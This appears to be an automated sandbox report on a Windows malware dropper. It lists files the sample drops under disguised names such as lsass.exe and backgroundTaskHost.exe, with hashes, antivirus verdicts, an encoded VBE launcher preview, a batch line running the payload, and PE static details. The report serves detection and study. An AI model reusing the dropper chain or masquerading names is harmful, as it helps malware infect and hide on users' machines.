SHA-256:	71A10906FD555AE5B93B9CAC9288933EF9720CCF934D425AE29200F1B2666FF2
SHA-512:	3FAAAB6EAA6683A5191DF19C5F0437C69EB7769A90DFEE0347D4DC7DD55EC1C94E8DDB0604E31D3CC7C61FBCF0D52A8AC55AA6B56DF60F14A03DC4EF1EF3C8AD
Malicious:	false
Reputation:	low
Preview:	KaS8EXIot5lUNMy5wHVoGou1rcOf3pucYXiAFuElS9kS5LlETAAelqzgpbRlImvELI5znx0BCuWHEc5f1KM3oQ1shCVodddqNgHwQvbfJ8c1UrcNfvu7a1Z4RNRlcLiiRp3hVIPFtqtqyAYzkHIstfPWHMfDezC7a3koy42XfoOtIsGQybAVD0zvahaImMl3nvQ4atBpPvMERfNYFOOCzr4jEyOQdtuSDUGWcM0EZUFRnue4TCCX8jE51q0mfvMfB3B6Z153YJmemn5TTT6brWUdQKfwVNioIkQusifcHJ9y6jTOugSMyuyoihpPVIiKk8VCWLlvyeUhXggq0RCy5WzXvlLK2PG8lyO8NR1i5gYUaQRCB8YEGtPOI8QvAa3iXV6iRiciad2Z7e6fTIJ30C21j90PBGifn06FTtucg0om1zQnBvb1QArVdF9SrNhT4XwHi1LkXqXAXPAtsMOQprOmIllOtcvTSUrdDJFJk0dkmq8NEPjf8RoNIJ86P6055EsChgqjGEqyNo9cmXJe3PUBqeV4KI4n9ioi85qij9Y4lzAeJgT1wWCptrWDLwZ8JCyo9aerrl531Za0d1uoyC0ng8zRimXxkZuiBVesBmKLbIxUQfjUBvJHLLIAlNIENITbo1zHWCmM1pMXLeADDDvzQnXzNdGydF7TzVqZqb79I7Qf8uzHNFBKWdLBd9425ytvs3hzykWlFvqTW10co8kXEw6VKo6qhEDTOexFNATnsaEkx2olJbO6NVr57LpJnqDBsWE2EvPnp7oosViRAUhF0GG2x2IBUK9CWD2axvhXMkRPqCMlnXITJ7KlQMFLmOSf8mRocIdOwJ3Pz0LupgX7Bp3Y2RJlqWv7RwREuiIe44g9D5vZAUgF0VdSs2vL81haY67DjG9HX3CHJ3V7fulV0pH5S9V1w7gCWFlH7s03UYr

C:\Recovery\wjIuhVBtfHXnMCZlWDoj.exe Download File
Process:	C:\refhostperfdllCommon\refhostperfdllCommonsessionnetsvc.exe
File Type:	PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	1005056
Entropy (8bit):	6.304363811100068
Encrypted:	false
SSDEEP:	12288:RrC9hUiTQ4XmycIJ83QYQzC76HKtkzWkeQwwcwFWnP4q65Iqn4:ChHlmyb8uonlHQwhn/r+4
MD5:	4E66AE5C311A1AADC1241790C112525F
SHA1:	0E697DE0A696E498897118D193E4EBC854EAD1E2
SHA-256:	08D8DB67DDAE643CE598DC41C4BF56156079461A79CDB2BDB5783EB6FD804B51
SHA-512:	E10C940EB260F9B1BC305A7B0AABA7760806B4712500223D3B9920F800546B44A02D11CE9A16DA17CABD5C986C68F535CD27387A8BD4F01929061FEDFFE6B5B9
Malicious:	true
Antivirus:	Antivirus: Avira, Detection: 100% Antivirus: Joe Sandbox ML, Detection: 100%
Reputation:	low
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....].a.....................Z......n.... ... ....@.. ....................................@................................. ...K....... ............................................................................ ............... ..H............text...t.... ...................... ..`.sdata...R... ...T..................@....rsrc... ............P..............@..@.reloc...............T..............@..B................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\lsass.exe.log Download File
Process:	C:\Users\user\Pictures\Camera Roll\lsass.exe
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	1281
Entropy (8bit):	5.367899416177239
Encrypted:	false
SSDEEP:	24:ML9E4KrL1qE4GiD0E4KeGiKDE4KGKN08AKhPKIE4TKD1KoZAE4KKPz:MxHKn1qHGiD0HKeGiYHKGD8AoPtHTG1Q
MD5:	7115A3215A4C22EF20AB9AF4160EE8F5
SHA1:	A4CAB34355971C1FBAABECEFA91458C4936F2C24
SHA-256:	A4A689E8149166591F94A8C84E99BE744992B9E80BDB7A0713453EB6C59BBBB2
SHA-512:	2CEF2BCD284265B147ABF300A4D26AD1AAC743EFE0B47A394FB614B6843A60B9F918E56261A56334078D0D9681132F3403FB734EE66E1915CF76F29411D5CE20
Malicious:	false
Reputation:	moderate, very likely benign file
Preview:	1,"fusion","GAC",0..1,"WinRT","NotApp",1..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System\10a17139182a9efd561f01fada9688a5\System.ni.dll",0..3,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Drawing\49e5c0579db170be9741dccc34c1998e\System.Drawing.ni.dll",0..3,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Windows.Forms\6d7d43e19d7fc0006285b85b7e2c8702\System.Windows.Forms.ni.dll",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Core\4e05e2e48b8a6dd267a8c9e25ef129a7\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_64\S

C:\Users\user\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\refhostperfdllCommonsessionnetsvc.exe.log Download File
Process:	C:\refhostperfdllCommon\refhostperfdllCommonsessionnetsvc.exe
File Type:	ASCII text, with CRLF line terminators
Category:	modified
Size (bytes):	1740
Entropy (8bit):	5.360872475306136
Encrypted:	false
SSDEEP:	48:MxHKn1qHGiD0HKeGiYHKGD8AoPtHTG1hAHKKP5H+RHKl:iqnwmI0qerYqGgAoPtzG1eqKP5gql
MD5:	7AC9E3ED5E1926DAE60D44553AFE67FE
SHA1:	1EC2BB13633A3C21E2F3206696D89876B15E160F
SHA-256:	97BCE2B4536F07A3269FCCA71C9768C9D516D065BE0E538B17BADB90C32A6554
SHA-512:	D8070849646B1E8967C713800098073E68B0FF5EAB55E06A32E0C365A6D49E5FB1718340459B4710B4A8DC6CDE8EA1345F7935CD0C7E27A18BEF71B8309A5B27
Malicious:	false
Preview:	1,"fusion","GAC",0..1,"WinRT","NotApp",1..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System\10a17139182a9efd561f01fada9688a5\System.ni.dll",0..3,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Drawing\49e5c0579db170be9741dccc34c1998e\System.Drawing.ni.dll",0..3,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Windows.Forms\6d7d43e19d7fc0006285b85b7e2c8702\System.Windows.Forms.ni.dll",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Core\4e05e2e48b8a6dd267a8c9e25ef129a7\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_64\S

C:\Users\user\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\wjIuhVBtfHXnMCZlWDoj.exe.log Download File
Process:	C:\Recovery\wjIuhVBtfHXnMCZlWDoj.exe
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	1281
Entropy (8bit):	5.367899416177239
Encrypted:	false
SSDEEP:	24:ML9E4KrL1qE4GiD0E4KeGiKDE4KGKN08AKhPKIE4TKD1KoZAE4KKPz:MxHKn1qHGiD0HKeGiYHKGD8AoPtHTG1Q
MD5:	7115A3215A4C22EF20AB9AF4160EE8F5
SHA1:	A4CAB34355971C1FBAABECEFA91458C4936F2C24
SHA-256:	A4A689E8149166591F94A8C84E99BE744992B9E80BDB7A0713453EB6C59BBBB2
SHA-512:	2CEF2BCD284265B147ABF300A4D26AD1AAC743EFE0B47A394FB614B6843A60B9F918E56261A56334078D0D9681132F3403FB734EE66E1915CF76F29411D5CE20
Malicious:	false
Preview:	1,"fusion","GAC",0..1,"WinRT","NotApp",1..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System\10a17139182a9efd561f01fada9688a5\System.ni.dll",0..3,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Drawing\49e5c0579db170be9741dccc34c1998e\System.Drawing.ni.dll",0..3,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Windows.Forms\6d7d43e19d7fc0006285b85b7e2c8702\System.Windows.Forms.ni.dll",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Core\4e05e2e48b8a6dd267a8c9e25ef129a7\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_64\S

C:\Users\user\Pictures\Camera Roll\6203df4a6bafc7 Download File
Process:	C:\refhostperfdllCommon\refhostperfdllCommonsessionnetsvc.exe
File Type:	ASCII text, with very long lines, with no line terminators
Category:	dropped
Size (bytes):	675
Entropy (8bit):	5.891310729251569
Encrypted:	false
SSDEEP:	12:DOB1NmPsK15+T3g1O/ezt7yXH9CVQ8pLfLL/0rEPPzPcsVtEPvu2:SDQPj15+T34WeakzL/0IPPzksV8u2
MD5:	B026BC253DC1C8E4F743CD7CD6016E40
SHA1:	C8519D92F0ACDAE6CB9A29DF8CC89AEBDFF7CC22
SHA-256:	B7FC66800295ED68EA4045E6A3F88ECC9C47F4E8FF1B3412EA4F1DFD5FC8BA37
SHA-512:	EB8CE932671F72BC86B358E5EC159276FD78B0360E5007CDEE021C5A9560CADDCA7065C90B4AEA349414F61BC01038319B760D132CAFA38C3E155BDF9E9136A9
Malicious:	false
Preview:	HvqAOYFognqiIZxrZOvyCLkyJ8sVjS9rdIG5goRISt4oQfGjR3ObnJm5K11QqtENn9FAS2Kv6nfTQ6hn2IEqEiDTfLuowAcjorBRaGRZsdeAnToOUOYhoXJF5veHHf85L6pj4QMw1p8kEDqMggUim54Qh5VplJRMeizqoFTEBmp8ZiA1ERkkLaTPCYC84hKsXwFfO9ibMQgAP5185ekUjrBEPjoPDUJeb7kncenFsIY43S9GgDDa7zIquBQpVSY2HCiSVOfa1flaTGL6jis9Qtgmy42bO7tZufx1trvShnjcNsXn0TGxjYlXf6eaWEL3vLqxTTN2xacnKEYGgOl416zV4ZVxMU6dbpqCCkUgGNAJ68MahY4HcRBzVU238Zpcd9LeYWE63Fxn5qY6N5PyayAKn1qrrairihp7xrCLU7OWdY3p56qCK1Cp8A1gpWPdhGFYAbJf2DedknrP7BvvufgreA8w0fg7ruzWTfoewLKGWjEUTmjolesCkX3AcWoXhhvzyU5cWQ8iUaU55odO61VNCww5moBZgwizyPg8qHSUfKrJD8Fy3abqLhxBi90sPiCi1eGqHfhyjBr2Fm2ojNgGV2oQbeZqRjF7HJSi1ZqX2mGKz555HMJBC5M800OmF0h95uu6UUwKgINtweagidjFaD5M6UrBKDS

C:\Users\user\Pictures\Camera Roll\lsass.exe Download File
Process:	C:\refhostperfdllCommon\refhostperfdllCommonsessionnetsvc.exe
File Type:	PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	1005056
Entropy (8bit):	6.304363811100068
Encrypted:	false
SSDEEP:	12288:RrC9hUiTQ4XmycIJ83QYQzC76HKtkzWkeQwwcwFWnP4q65Iqn4:ChHlmyb8uonlHQwhn/r+4
MD5:	4E66AE5C311A1AADC1241790C112525F
SHA1:	0E697DE0A696E498897118D193E4EBC854EAD1E2
SHA-256:	08D8DB67DDAE643CE598DC41C4BF56156079461A79CDB2BDB5783EB6FD804B51
SHA-512:	E10C940EB260F9B1BC305A7B0AABA7760806B4712500223D3B9920F800546B44A02D11CE9A16DA17CABD5C986C68F535CD27387A8BD4F01929061FEDFFE6B5B9
Malicious:	true
Antivirus:	Antivirus: Avira, Detection: 100% Antivirus: Joe Sandbox ML, Detection: 100%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....].a.....................Z......n.... ... ....@.. ....................................@................................. ...K....... ............................................................................ ............... ..H............text...t.... ...................... ..`.sdata...R... ...T..................@....rsrc... ............P..............@..@.reloc...............T..............@..B................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Windows\System32\umdmxfrm\backgroundTaskHost.exe Download File
Process:	C:\refhostperfdllCommon\refhostperfdllCommonsessionnetsvc.exe
File Type:	PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	1005056
Entropy (8bit):	6.304363811100068
Encrypted:	false
SSDEEP:	12288:RrC9hUiTQ4XmycIJ83QYQzC76HKtkzWkeQwwcwFWnP4q65Iqn4:ChHlmyb8uonlHQwhn/r+4
MD5:	4E66AE5C311A1AADC1241790C112525F
SHA1:	0E697DE0A696E498897118D193E4EBC854EAD1E2
SHA-256:	08D8DB67DDAE643CE598DC41C4BF56156079461A79CDB2BDB5783EB6FD804B51
SHA-512:	E10C940EB260F9B1BC305A7B0AABA7760806B4712500223D3B9920F800546B44A02D11CE9A16DA17CABD5C986C68F535CD27387A8BD4F01929061FEDFFE6B5B9
Malicious:	true
Antivirus:	Antivirus: Avira, Detection: 100% Antivirus: Joe Sandbox ML, Detection: 100%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....].a.....................Z......n.... ... ....@.. ....................................@................................. ...K....... ............................................................................ ............... ..H............text...t.... ...................... ..`.sdata...R... ...T..................@....rsrc... ............P..............@..@.reloc...............T..............@..B................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Windows\System32\umdmxfrm\eddb19405b7ce1 Download File
Process:	C:\refhostperfdllCommon\refhostperfdllCommonsessionnetsvc.exe
File Type:	ASCII text, with very long lines, with no line terminators
Category:	dropped
Size (bytes):	669
Entropy (8bit):	5.898005341738037
Encrypted:	false
SSDEEP:	12:DBYJ1n7P/N5PX3OB3f/TaTFYNejCf8SfSiiJfmVC75kKWrFW4gsFWbpy8ZxNG:6J1n7t5P83zaTUfxf/iJS3rw4gs58ZHG
MD5:	C4F153DB69F9163AE21EE298A7A17987
SHA1:	D67E6B1131FBEEE20B1B50FB4DEA50323E113497
SHA-256:	88080CAE6BB969A00918DA20FE8EEE690E508406E002AF17DF3E763F693D3592
SHA-512:	E66F992F8633B533D8B6FDFB90F4CC0E69860B1E136356C1276C1CCE0E497BF4856D56F3F5A25F826921A3E9FF98511444B9BFB6E7E178A5E1D1F52D2CFF1929
Malicious:	false
Preview:	OQMktyBujuHUaW9uDSN9x3rAb7Km60gU7SRvKf1S58QINDRkTlFgUz2VjLJwoZytOxXHEOkia4DzmixXpjSUv9AIa6M9VFngKh4ZqKfFBgGZvCsAXvGFGd8OxOrIBkMURhoEoYrfENSO3kXXOLmj9iZqjplbcXDbTvINYnW8ElA3LtVM1T408mVsI8f8xPCrK14HcJ9kznfYhgfzUYjIdMcqaZFZIXLyiTsUyNtsUTBVH7KmdqnYp3N7YOrDDjbbcqzOxLAHo1yJLHjdPd6ctwJoFv5kfqou2j2aH5ySpgtyFEvRoOxkn9rphLIBPZm7MDRlOIVToowNCUjA9o6R3DH22N36xxCP4wlBxKCg2d68MenMlHCldUEJ5YtBOZg1lhTQthNzmZYZHJqXjqUpubwjrcGZaARc7FXpLWdE4N9D6oBwrVbhF0GKvtiQbxYlI5cCvBMNNQvhcsmCaTrEitXG8N4bxMnGyX5AM9AqJOUyFirCGg0HFTCYhVDiGuZBnotExm0bSB4UZjBZf1URWfAeVgd05cjZySLbznPepYyEZs98UoDPZIpHnOtQJ9f0bffGXkk1m0l7r6FmgegRYU9qnExk48Vq37n3M3luDLmjgrZrJGuocObGfycSw97ne5EuSLan3wNNraK6pGayOrNofhXXb

C:\refhostperfdllCommon\mbuli7h5qN.vbe Download File
Process:	C:\Users\user\Desktop\9bdcc933d0c04da1fa41ba915c460d9fa573e4bc5814b.exe
File Type:	data
Category:	dropped
Size (bytes):	203
Entropy (8bit):	5.773879727999392
Encrypted:	false
SSDEEP:	6:GFt2wqK+NkLzWbHK/818nZNDd3RL1wQJR80zSQbs:GFt7MCzWLKG4d3XBJ20+R
MD5:	757B50FD5D788BA7E256A3E77451C547
SHA1:	1FCBE9134894A2332A01ADF3AD8A81E568280DEC
SHA-256:	BCBB7284A180E1EF6153FAFADBD097F3A0D11B52DB126B0C2825D5151EC6A551
SHA-512:	A31A7D22B39F636F59D8755D18E84FF4F900A7B7505F711658528876E4D7E9655774FBCA15E4861FDB2479F7BDA5575FB24476CAEF76B4187E56D0A74371C01D
Malicious:	false
Preview:	#@~^sgAAAA==j.Y~q/4?t.V^~',Z.+mYn6(L+1O`r.?1.rwDRUtnVsE*@#@&.U^DbwO UV+n2vvT!Zb@#@&j.Y,./4?4nV^PxP;DnCD+r(%+1Y`r.jmMkaY ?4n^VE#@#@&.ktj4.VV ]!x~J;lJDn6tK/Ya+MWN^V/Ws:GUJD?ofXaR4mOE~,!BPWlsd.IzkAAA==^#~@.

C:\refhostperfdllCommon\rSX3yp.bat Download File
Process:	C:\Users\user\Desktop\9bdcc933d0c04da1fa41ba915c460d9fa573e4bc5814b.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	63
Entropy (8bit):	4.093612709800596
Encrypted:	false
SSDEEP:	3:I5QDVqXD/l2ARKWqXD/lcWWTTbAH:IO0N0NnyAH
MD5:	C6324E617643334D666C56C7C5512F67
SHA1:	EB4ED012A1147A1B3B464E88FB7ABA700C73EAD2
SHA-256:	38D60AD4DB38391E6FAEEE019BEFA3D2F72BE82B212244671354BD9BFBD372EE
SHA-512:	7FC8A7AE91396CDBB270E69B25ED50DF1B7178B6B5EE1042BB6CFA3BABE1599113A64B3BDE10DDA8DFA2B9A537FE17F527989730F9E9ECB1A0E45B74F5DB642F
Malicious:	false
Preview:	"C:\refhostperfdllCommon\refhostperfdllCommonsessionnetsvc.exe"

C:\refhostperfdllCommon\refhostperfdllCommonsessionnetsvc.exe Download File
Process:	C:\Users\user\Desktop\9bdcc933d0c04da1fa41ba915c460d9fa573e4bc5814b.exe
File Type:	PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	1005056
Entropy (8bit):	6.304363811100068
Encrypted:	false
SSDEEP:	12288:RrC9hUiTQ4XmycIJ83QYQzC76HKtkzWkeQwwcwFWnP4q65Iqn4:ChHlmyb8uonlHQwhn/r+4
MD5:	4E66AE5C311A1AADC1241790C112525F
SHA1:	0E697DE0A696E498897118D193E4EBC854EAD1E2
SHA-256:	08D8DB67DDAE643CE598DC41C4BF56156079461A79CDB2BDB5783EB6FD804B51
SHA-512:	E10C940EB260F9B1BC305A7B0AABA7760806B4712500223D3B9920F800546B44A02D11CE9A16DA17CABD5C986C68F535CD27387A8BD4F01929061FEDFFE6B5B9
Malicious:	true
Antivirus:	Antivirus: Avira, Detection: 100% Antivirus: Joe Sandbox ML, Detection: 100%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....].a.....................Z......n.... ... ....@.. ....................................@................................. ...K....... ............................................................................ ............... ..H............text...t.... ...................... ..`.sdata...R... ...T..................@....rsrc... ............P..............@..@.reloc...............T..............@..B................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

Static File Info

General
File type:	PE32 executable (GUI) Intel 80386, for MS Windows
Entropy (8bit):	6.496971119283181
TrID:	Win32 Executable (generic) Net Framework (10011505/4) 50.01% Win32 Executable (generic) a (10002005/4) 49.97% Generic Win/DOS Executable (2004/3) 0.01% DOS Executable Generic (2002/1) 0.01% Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
File name:	9bdcc933d0c04da1fa41ba915c460d9fa573e4bc5814b.exe
File size:	1322142
MD5:	a4d367f98a1fa3e594af0875379bda39
SHA1:	a82d6bafcc260138eb11b4a511ff6f3e80441ce3
SHA256:	9bdcc933d0c04da1fa41ba915c460d9fa573e4bc5814b8f3040eb8f3d29ef149
SHA512:	94deb8455db4863909dfccb33f7ceb128ff6a041c6e36d04d679df74fa0506443466ada3f3c13352d665e54d0440b2f086a8a599e7db914bc5e54df08f6ba547
SSDEEP:	24576:U2G/nvxW3Ww0tbhHlmyb8uonlHQwhn/r+47:UbA30dH36+yn/a4
File Content Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......b`..&...&...&.....h.+.....j.......k.>.....^.$...._..0...._..5...._....../y..,.../y..#...&...*...._......._..'...._f.'...._..'..

File Icon


Icon Hash:	d49494d6c88ecec2

Static PE Info

General
Entrypoint:	0x41ec40
Entrypoint Section:	.text
Digitally signed:	false
Imagebase:	0x400000
Subsystem:	windows gui
Image File Characteristics:	32BIT_MACHINE, EXECUTABLE_IMAGE
DLL Characteristics:	GUARD_CF, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
Time Stamp:	0x5FC684D7 [Tue Dec 1 18:00:55 2020 UTC]
TLS Callbacks:
CLR (.Net) Version:
OS Version Major:	5
OS Version Minor:	1
File Version Major:	5
File Version Minor:	1
Subsystem Version Major:	5
Subsystem Version Minor:	1
Import Hash:	fcf1390e9ce472c7270447fc5c61a0c1

Entrypoint Preview

Instruction
call 00007F06A04913D9h
jmp 00007F06A0490DEDh
cmp ecx, dword ptr [0043E668h]
jne 00007F06A0490F65h
ret
jmp 00007F06A049155Eh
int3
int3
int3
int3
int3
push ebp
mov ebp, esp
push esi
push dword ptr [ebp+08h]
mov esi, ecx
call 00007F06A0483CF7h
mov dword ptr [esi], 00435580h
mov eax, esi
pop esi
pop ebp
retn 0004h
and dword ptr [ecx+04h], 00000000h
mov eax, ecx
and dword ptr [ecx+08h], 00000000h
mov dword ptr [ecx+04h], 00435588h
mov dword ptr [ecx], 00435580h
ret
int3
int3
int3
int3
int3
int3
int3
int3
int3
int3
int3
int3
int3
lea eax, dword ptr [ecx+04h]
mov dword ptr [ecx], 00435568h
push eax
call 00007F06A04940FDh
pop ecx
ret
push ebp
mov ebp, esp
sub esp, 0Ch
lea ecx, dword ptr [ebp-0Ch]
call 00007F06A0483C8Eh
push 0043B704h
lea eax, dword ptr [ebp-0Ch]
push eax
call 00007F06A0493812h
int3
push ebp
mov ebp, esp
sub esp, 0Ch
lea ecx, dword ptr [ebp-0Ch]
call 00007F06A0490F04h
push 0043B91Ch
lea eax, dword ptr [ebp-0Ch]
push eax
call 00007F06A04937F5h
int3
jmp 00007F06A0495843h
jmp dword ptr [00433260h]
int3
int3
int3
int3
int3
int3
int3
int3
int3
int3
push 00421EB0h
push dword ptr fs:[00000000h]

Rich Headers

Programming Language:

[ C ] VS2008 SP1 build 30729
[EXP] VS2015 UPD3.1 build 24215
[LNK] VS2015 UPD3.1 build 24215
[IMP] VS2008 SP1 build 30729
[C++] VS2015 UPD3.1 build 24215
[RES] VS2015 UPD3 build 24213

Data Directories

Name	Virtual Address	Virtual Size	Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT	0x3c820	0x34	.rdata
IMAGE_DIRECTORY_ENTRY_IMPORT	0x3c854	0x3c	.rdata
IMAGE_DIRECTORY_ENTRY_RESOURCE	0x63000	0xdfd0	.rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION	0x0	0x0
IMAGE_DIRECTORY_ENTRY_SECURITY	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BASERELOC	0x71000	0x2268	.reloc
IMAGE_DIRECTORY_ENTRY_DEBUG	0x3aac0	0x54	.rdata
IMAGE_DIRECTORY_ENTRY_COPYRIGHT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_GLOBALPTR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_TLS	0x0	0x0
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG	0x35508	0x40	.rdata
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IAT	0x33000	0x260	.rdata
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT	0x3bdc4	0x120	.rdata
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_RESERVED	0x0	0x0

Sections

Name	Virtual Address	Virtual Size	Raw Size	Xored PE	ZLIB Complexity	File Type	Entropy	Characteristics
.text	0x1000	0x310ea	0x31200	False	0.583959526081	data	6.70807539634	IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
.rdata	0x33000	0xa612	0xa800	False	0.452845982143	data	5.22174270925	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.data	0x3e000	0x23728	0x1000	False	0.36767578125	data	3.70881866699	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_WRITE, IMAGE_SCN_MEM_READ
.didat	0x62000	0x188	0x200	False	0.4453125	data	3.2982538068	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_WRITE, IMAGE_SCN_MEM_READ
.rsrc	0x63000	0xdfd0	0xe000	False	0.637032645089	data	6.63675064042	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.reloc	0x71000	0x2268	0x2400	False	0.768120659722	data	6.55486201017	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

Resources

Name	RVA	Size	Type	Language	Country
PNG	0x63650	0xb45	PNG image data, 93 x 302, 8-bit/color RGB, non-interlaced	English	United States
PNG	0x64198	0x15a9	PNG image data, 186 x 604, 8-bit/color RGB, non-interlaced	English	United States
RT_ICON	0x65748	0x568	GLS_BINARY_LSB_FIRST	English	United States
RT_ICON	0x65cb0	0x8a8	dBase IV DBT of @.DBF, block length 1024, next free block index 40, next free block 0, next used block 0	English	United States
RT_ICON	0x66558	0xea8	data	English	United States
RT_ICON	0x67400	0x468	GLS_BINARY_LSB_FIRST	English	United States
RT_ICON	0x67868	0x10a8	dBase IV DBT of @.DBF, block length 4096, next free block index 40, next free block 0, next used block 0	English	United States
RT_ICON	0x68910	0x25a8	dBase IV DBT of `.DBF, block length 9216, next free block index 40, next free block 0, next used block 0	English	United States
RT_ICON	0x6aeb8	0x3d71	PNG image data, 256 x 256, 8-bit/color RGBA, non-interlaced	English	United States
RT_DIALOG	0x6f588	0x286	data	English	United States
RT_DIALOG	0x6f358	0x13a	data	English	United States
RT_DIALOG	0x6f498	0xec	data	English	United States
RT_DIALOG	0x6f228	0x12e	data	English	United States
RT_DIALOG	0x6eef0	0x338	data	English	United States
RT_DIALOG	0x6ec98	0x252	data	English	United States
RT_STRING	0x6ff68	0x1e2	data	English	United States
RT_STRING	0x70150	0x1cc	data	English	United States
RT_STRING	0x70320	0x1b8	data	English	United States
RT_STRING	0x704d8	0x146	Hitachi SH big-endian COFF object file, not stripped, 17152 sections, symbol offset=0x73006500	English	United States
RT_STRING	0x70620	0x446	data	English	United States
RT_STRING	0x70a68	0x166	data	English	United States
RT_STRING	0x70bd0	0x152	data	English	United States
RT_STRING	0x70d28	0x10a	data	English	United States
RT_STRING	0x70e38	0xbc	data	English	United States
RT_STRING	0x70ef8	0xd6	data	English	United States
RT_GROUP_ICON	0x6ec30	0x68	data	English	United States
RT_MANIFEST	0x6f810	0x753	XML 1.0 document, ASCII text, with CRLF line terminators	English	United States

Imports

DLL

Import

KERNEL32.dll

GetLastError, SetLastError, FormatMessageW, GetCurrentProcess, DeviceIoControl, SetFileTime, CloseHandle, CreateDirectoryW, RemoveDirectoryW, CreateFileW, DeleteFileW, CreateHardLinkW, GetShortPathNameW, GetLongPathNameW, MoveFileW, GetFileType, GetStdHandle, WriteFile, ReadFile, FlushFileBuffers, SetEndOfFile, SetFilePointer, SetFileAttributesW, GetFileAttributesW, FindClose, FindFirstFileW, FindNextFileW, GetVersionExW, GetCurrentDirectoryW, GetFullPathNameW, FoldStringW, GetModuleFileNameW, GetModuleHandleW, FindResourceW, FreeLibrary, GetProcAddress, GetCurrentProcessId, ExitProcess, SetThreadExecutionState, Sleep, LoadLibraryW, GetSystemDirectoryW, CompareStringW, AllocConsole, FreeConsole, AttachConsole, WriteConsoleW, GetProcessAffinityMask, CreateThread, SetThreadPriority, InitializeCriticalSection, EnterCriticalSection, LeaveCriticalSection, DeleteCriticalSection, SetEvent, ResetEvent, ReleaseSemaphore, WaitForSingleObject, CreateEventW, CreateSemaphoreW, GetSystemTime, SystemTimeToTzSpecificLocalTime, TzSpecificLocalTimeToSystemTime, SystemTimeToFileTime, FileTimeToLocalFileTime, LocalFileTimeToFileTime, FileTimeToSystemTime, GetCPInfo, IsDBCSLeadByte, MultiByteToWideChar, WideCharToMultiByte, GlobalAlloc, 